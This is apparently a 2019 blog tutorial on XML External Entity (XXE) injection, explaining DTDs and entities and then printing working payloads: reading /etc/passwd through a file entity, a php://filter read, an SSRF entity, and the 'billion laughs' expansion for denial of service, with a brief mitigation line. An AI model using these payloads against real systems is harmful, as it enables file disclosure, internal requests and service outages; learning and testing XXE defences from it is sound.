Thursday, 17 January 2019

The Basic's of XXE - XML External Entity attack.

One of the prime goal in web hacking is to get a backdoor and own the target. XXE will help you to
achieve this. But before discussing about XXE Injection you must know basics of XML. and yeah memes are here to eradicate boredom.


Introduction
According to google, XML is a metalanguage which allows user to define their own customized markup languages, especially in order to display documents on the internet.

some features of XML are 
  • It simplifies data transport and sharing
  • it simplifies platform change
  • it increases data availability

well, XML is boring but...



What is DTD? 
DTD stands for Document Type Defination and it defines the structure and legal elements and the attributes of an XML document.

DTD is used to verify that XML data is valid or not. DTD can be either declared externally or internally.

Internal Declaration of DTD
Inside the XML file DTD is wrapped in <!DOCTYPE> definition. Here is an example from w3schools:


NOTE : In a raw XML file you can view DTD by view-source feature.

let's Break Down this code snippet.

  • <!DOCTYPE note Defines that the root element of this document is note
  • !ELEMENT note Defines that the element note contains four other elements "to, from, heading, body"
  • <!ELEMENT to, from, heading, body (#PCDATA)> Defines the element to be of type #PCDATA.

External Declaration of DTD
If DTD is declared in an External file then the <!DOCTYPE> Definition must contain the URI to the DTD file.

Here is another code snippet from w3schools


and here is the external file which contains the DTD


#PCDATA is parsed character data



What are DTD Entities?
Entities are used to define shortcut to special characters.

for Declaration types and more information please consider reading this - https://www.w3schools.com/xml/xml_dtd_entities.asp

Now that's a lot of XML. Let's now get back to the maim topic XXE Injection.

Who is affected with XXE?
well, lots of apps use xml, configuration files use xml, many protocols rely on xml and some use it without even knowing it.

What can we Exploit with XXE?
Well, we can exploit XXE in various places including
  • Local File Inclusion
<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

  • Access Controll Bypass
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>
  • SSRF

<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>





  • Denial of Service

  • 
    
    <?xml version="1.0"?>
    <!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ELEMENT lolz (#PCDATA)>
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
    ]>
    <lolz>&lol9;</lolz>
    
    
    
    
     How to Exploit XXE?
    
    
    Here is a short 2 minute video demonstrating how to exploit XXE using Burp Suite.
    
    

    How to mitigate XXE?
    The best and the easiest way to mitigate from XXE is to disable XXE by default and a lot of parsers actually do it.

    and here we end our tutorial. Thankyou so much for reading guys, below are the links for further reading check them for sure.

    Resources 

    
    
    
    

    No comments:

    Post a Comment